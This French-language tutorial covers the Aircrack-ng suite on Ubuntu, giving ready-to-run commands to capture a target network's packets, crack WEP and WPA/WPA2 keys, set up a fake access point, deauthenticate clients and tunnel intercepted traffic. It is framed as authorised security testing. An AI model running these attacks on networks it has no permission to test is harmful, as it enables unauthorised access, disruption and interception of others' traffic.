Aircrack-ng

Introduction

Cet article vous guide à travers le processus d’installation d’Aircrack-ng sur Ubuntu, comment utiliser ses fonctionnalités de base, et vous fournit une cheatsheet pratique. Ces outils doivent être utilisés de manière légale et éthique, avec l’autorisation appropriée, pour garantir que leur utilisation soit conforme aux lois en vigueur et aux bonnes pratiques en matière de cybersécurité. Aircrack-ng est une suite logicielle open-source pour tester la sécurité des réseaux Wi-Fi. Il comprend des outils pour la capture de paquets, le craquage de clés WEP/WPA, et l’analyse du trafic réseau.

Installation d’Aircrack-ng sur Ubuntu

Pour installer Aircrack-ng sur Ubuntu, ouvrez votre terminal et exécutez les commandes suivantes :

sudo apt-get update
sudo apt-get install aircrack-ng

Cela mettra à jour la liste des paquets disponibles pour Ubuntu, puis installera la suite Aircrack-ng.

“Craquer” un Réseau Wi-Fi

  1. Identifier l’Interface Wi-Fi. Utilisez la commande suivante pour lister toutes les interfaces :
ip link show

Supposons que votre interface soit wlan0.

  1. Activer le Mode Moniteur :

Utilisez airmon-ng pour activer le mode moniteur sur votre interface :

sudo airmon-ng start wlan0

Cela créera une nouvelle interface, généralement nommée wlan0mon.

  1. Scanner les Réseaux :

Utilisez airodump-ng pour scanner les réseaux à portée :

sudo airodump-ng wlan0mon

Notez le BSSID (adresse MAC) et le canal du réseau “Ravindra_ssid”.

  1. Capturer les Paquets du Réseau Cible :

Capturez les paquets du réseau “Ravindra_ssid” en spécifiant le BSSID et le canal :

sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 -w capture wlan0mon

Remplacez AA:BB:CC:DD:EE:FF par le BSSID du réseau cible et 6 par le canal approprié.

  1. Améliorer la Capture de Paquets

Pour accélérer la capture de paquets, vous pouvez utiliser aireplay-ng pour effectuer une attaque par réinjection ARP :

sudo aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon

-b est le BSSID du réseau cible. -h est l’adresse MAC de votre interface (vous pouvez la trouver avec ifconfig wlan0mon).

  1. Craquage de clés WEP

Pour craquer une clé WEP, utilisez aircrack-ng avec le fichier de capture :

sudo aircrack-ng -b AA:BB:CC:DD:EE:FF capture-01.cap
  1. Craquage de clés WPA/WPA2

Pour craquer une clé WPA/WPA2, utilisez aircrack-ng avec un dictionnaire (voir les dictionnaires disponibles à la fin de l’article)

aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture_file.cap

Cette commande tentera de décrypter la clé WPA/WPA2 à l’aide du fichier de dictionnaire fourni.

Airbase-ng : Création de Faux Réseaux

Airbase-ng permet de créer de faux points d’accès pour tester la réaction des appareils clients. Lancer un Faux Point d’Accès (ad-hoc) nommé “Free WiFi” :

sudo airbase-ng -e "Free WiFi" wlan0mon

-e : Nom du réseau (SSID) diffusé.

Aireplay-ng : Injection et Attaques

Aireplay-ng est utilisé pour injecter des paquets et effectuer diverses attaques sur les réseaux Wi-Fi.

Testez si votre carte réseau supporte l’injection de paquets :

sudo aireplay-ng --test wlan0mon

Scénario : Attaque de Désauthentification

Déconnecter un Client, Forcer un client à se déconnecter d’un réseau :

sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

-a : BSSID du point d’accès. -c : Adresse MAC du client cible.

Airtun-ng : Création de Tunnels

Airtun-ng est utilisé pour créer des tunnels virtuels, permettant d’intercepter et d’analyser le trafic après avoir accédé à un réseau. Après avoir craqué une clé WEP, créez un tunnel pour analyser le trafic :

sudo airtun-ng -a AA:BB:CC:DD:EE:FF -w wepkey wlan0mon

-a : BSSID du réseau cible. -w : Clé WEP connue.

Dictionnaire

Vous pouvez trouver des dictionnaires de mots de passe à divers endroits pour tester la sécurité de vos systèmes. Voici quelques exemples notables :

Cheatsheet

Voici une cheatsheet des commandes Aircrack-ng les plus couramment utilisées pour référence rapide :

Démarrer le mode monitor :

sudo airmon-ng start [interface]

Capturer le trafic :

sudo airodump-ng [interface_mon]

Craquer une clé WEP :

aircrack-ng -b [BSSID] [capture_file.cap]

Craquer une clé WPA/WPA2 :

 aircrack-ng -w [wordlist.txt] -b [BSSID] [capture_file.cap]

Conclusion

La suite Aircrack-ng est une boîte à outils puissante pour les tests de sécurité des réseaux Wi-Fi. Chaque outil a des applications spécifiques, de la surveillance à l’attaque active, et doit être utilisé de manière responsable et légale, uniquement dans des environnements où vous êtes autorisé à effectuer ces tests.